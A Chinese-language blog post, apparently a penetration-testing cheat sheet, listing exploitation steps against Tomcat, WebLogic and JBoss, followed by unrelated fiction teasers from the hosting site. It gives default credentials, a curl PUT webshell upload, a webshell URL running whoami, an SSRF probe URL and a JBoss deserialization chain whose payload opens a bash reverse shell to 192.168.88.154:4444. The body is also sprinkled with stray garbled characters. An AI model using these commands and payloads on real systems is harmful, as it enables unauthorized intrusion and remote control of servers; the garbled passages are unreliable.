一些中間件的漏洞

一完域、Tomcat

1栏渺、弱口令

(1)將shell.jsp壓縮成shell.zip

(2)將后綴名改成shell.war

(3)192.168.88.152:8080/manager/html上傳war包

(4)訪問http://192.168.88.152:8080/shell/shell.jsp即可getshell

2、PUT方法寫文件漏洞

curl -X PUT http://192.168.88.152:8080/shell.jsp/ -d @- < shell.jsp

使用" / "可繞過文件后綴的檢測凯傲。

二犬辰、Weblogic

1、弱口令

weblogic后臺:http://192.168.88.152:7001/console

常見弱口令:weblogic/weblogic冰单、weblogic/Oracle@123幌缝、system/system

2、XMLDecoder反序列化(CVE-2017-10271)

(1)寫文件

(2)/dev/tcp反彈shell

3诫欠、T3協(xié)議反序列化(CVE-2018-2628)涵卵,需要通過T3協(xié)議觸發(fā)

(1)使用nmap掃描是否開啟t3協(xié)議

nmap 192.168.88.152 -p7001 --script="weblogic-t3-info.nse"

(2)使用CVE-2018-2628-poc.py測試是否存在漏洞

(3)使用K8飛刀上傳webshell

(4)使用cve-2018-2628.py連接webshell

工具:https://github.com/jas502n/CVE-2018-2628

4、任意文件上傳漏洞(CVE-2018-2894)荒叼,需要啟用web服務(wù)測試頁

(1)http://192.168.88.152:7001/ws_utc/config.do頁面存在未授權(quán)訪問

(2)將Work Home Dir設(shè)置為css目錄

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

(3)點擊安全--增加轿偎,然后上傳webshell

(4)根據(jù)返回的時間戳,構(gòu)造webshell地址

http://192.168.88.152:7001/ws_utc/css/config/keystore/1545874426954_muma.jsp?pwd=023&i=whoami

工具:https://github.com/LandGrey/CVE-2018-2894

5被廓、SSRF

漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp坏晦,訪問以下url地址:

http://192.168.88.152:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

端口開放,返回error code

端口關(guān)閉,返回could not connect over HTTP to server

如果目標開放了redis服務(wù)昆婿,可結(jié)合未授權(quán)訪問進行攻擊球碉。

三、Jboss

1挖诸、JMX反序列化

使用DeserializeExploit.jar進行測試

2汁尺、5.x/6.x 反序列化漏洞(CVE-2017-12149)

工具:https://github.com/yunxu1/jboss-_CVE-2017-12149

3、JMS 反序列化(CVE-2017-7504)

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.88.154/4444 0>&1"

curl http://192.168.88.152:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

工具:https://github.com/joaomatosf/JavaDeserH2HC

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末多律,一起剝皮案震驚了整個濱河市痴突,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌狼荞,老刑警劉巖辽装,帶你破解...
    沈念sama閱讀 217,657評論 6 505
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異相味,居然都是意外死亡拾积,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,889評論 3 394
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門丰涉,熙熙樓的掌柜王于貴愁眉苦臉地迎上來拓巧,“玉大人,你說我怎么就攤上這事一死「囟龋” “怎么了?”我有些...
    開封第一講書人閱讀 164,057評論 0 354
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵投慈,是天一觀的道長承耿。 經(jīng)常有香客問我,道長伪煤,這世上最難降的妖魔是什么加袋? 我笑而不...
    開封第一講書人閱讀 58,509評論 1 293
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮抱既,結(jié)果婚禮上职烧,老公的妹妹穿的比我還像新娘。我一直安慰自己蝙砌,他們只是感情好阳堕,可當我...
    茶點故事閱讀 67,562評論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著择克,像睡著了一般恬总。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上肚邢,一...
    開封第一講書人閱讀 51,443評論 1 302
  • 城市分裂傳說
    那天壹堰,我揣著相機與錄音拭卿,去河邊找鬼。 笑死贱纠,一個胖子當著我的面吹牛峻厚,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播谆焊,決...
    沈念sama閱讀 40,251評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼惠桃,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了辖试?” 一聲冷哼從身側(cè)響起辜王,我...
    開封第一講書人閱讀 39,129評論 0 276
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎罐孝,沒想到半個月后呐馆,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,561評論 1 314
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡莲兢,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,779評論 3 335
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年汹来,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片改艇。...
    茶點故事閱讀 39,902評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡收班,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出谒兄,到底是詐尸還是另有隱情闺阱,我是刑警寧澤,帶...
    沈念sama閱讀 35,621評論 5 345
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布舵变,位于F島的核電站,受9級特大地震影響瘦穆,放射性物質(zhì)發(fā)生泄漏纪隙。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,220評論 3 328
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一扛或、第九天 我趴在偏房一處隱蔽的房頂上張望绵咱。 院中可真熱鬧,春花似錦熙兔、人聲如沸悲伶。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,838評論 0 22
  • 一樁弒父案住涉,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽麸锉。三九已至,卻和暖如春舆声,著一層夾襖步出監(jiān)牢的瞬間花沉,已是汗流浹背柳爽。 一陣腳步聲響...
    開封第一講書人閱讀 32,971評論 1 269
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留碱屁,地道東北人磷脯。 一個月前我還...
    沈念sama閱讀 48,025評論 2 370
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像娩脾,于是被迫代替她去往敵國和親赵誓。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,843評論 2 354

推薦閱讀更多精彩內(nèi)容